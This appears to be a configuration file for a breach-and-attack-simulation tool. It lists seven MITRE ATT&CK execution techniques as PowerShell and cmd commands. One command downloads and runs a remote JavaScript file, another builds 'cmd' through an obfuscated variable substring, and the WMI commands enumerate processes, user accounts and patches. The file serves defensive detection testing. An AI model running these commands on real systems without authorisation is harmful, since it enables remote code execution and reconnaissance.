commands:
  # Execution      - Total Commands : 7
  # Last Modified   - May 8 2025 
#T1059.007
  - technique: "T1059.007 - Command and Scripting Interpreter:JavaScript"
    command: |
      Invoke-WebRequest -Uri "https://darkydeliver.github.io/sysinfo/sysinfo.js" -OutFile "$PWD\sysinfo.js";
      Start-Process -FilePath "cmd" -ArgumentList "/c cscript `"$PWD\sysinfo.js`"" -Wait -NoNewWindow -PassThru;
      Remove-Item -Path "$PWD\sysinfo.js";
    executor: "powershell"
    file_name: "sysinfo_js_output"

#T1059.003
  - technique: "T1059.003 - Command and Scripting Interpreter:Windows Command Shell - Executes a command in the Windows Command Shell to write a message to a file and display its contents."
    command: |
      %LOCALAPPDATA:~-3,1%md /c echo "Executes a command in the Windows Command Shell to write a message" > C:\system34\Execution_Output\SputnikBAS_Suspicious_Execution_via_Windows_Command_Shell.txt
    executor: "cmd"
    file_name: "SputnikBAS_Suspicious_Execution_via_Windows_Command_Shell.txt"

  - technique: "T1059.003 - Command and Scripting Interpreter:Windows Command Shell -Writes text to a file and display the results"    #### REmove
    command: |
        echo "Writes text to a file and display the results" > C:\system34\Execution_Output\Drop_file_output.txt
    executor: "cmd"
    file_name: "Drop_file_output.txt"

  - technique: "T1059.003 - Command and Scripting Interpreter:Windows Command Shell -Writes text to a file and display the results"
    command: |
      cmd /c "for /l %x in (1,1,1) do start wordpad.exe /p C:\\system34\\Execution_Output\\WMI_software_output.txt" | out-null
      stop-process -name wordpad -force -erroraction silentlycontinue
    executor: "powershell"
    file_name: "PrintBombing_output"

#T1047
  - technique: "T1047 - Windows Management Instrumentation - process"
    command: "wmic process get caption,executablepath,commandline /format:csv"
    executor: "powershell"
    file_name: "WMI_process_output"

  - technique: "T1047 - Windows Management Instrumentation - users"
    command: "wmic useraccount get /ALL /format:csv"
    executor: "powershell"
    file_name: "WMI_users_output"

  - technique: "T1047 - Windows Management Instrumentation - software"
    command: "wmic qfe get description,installedOn /format:csv"
    executor: "powershell"
    file_name: "WMI_software_output"

paths:
  baseFolder: "C:\\system34"
  outputFolder: "C:\\system34\\Execution_Output"
  SummaryFolder: "C:\\system34\\Summary"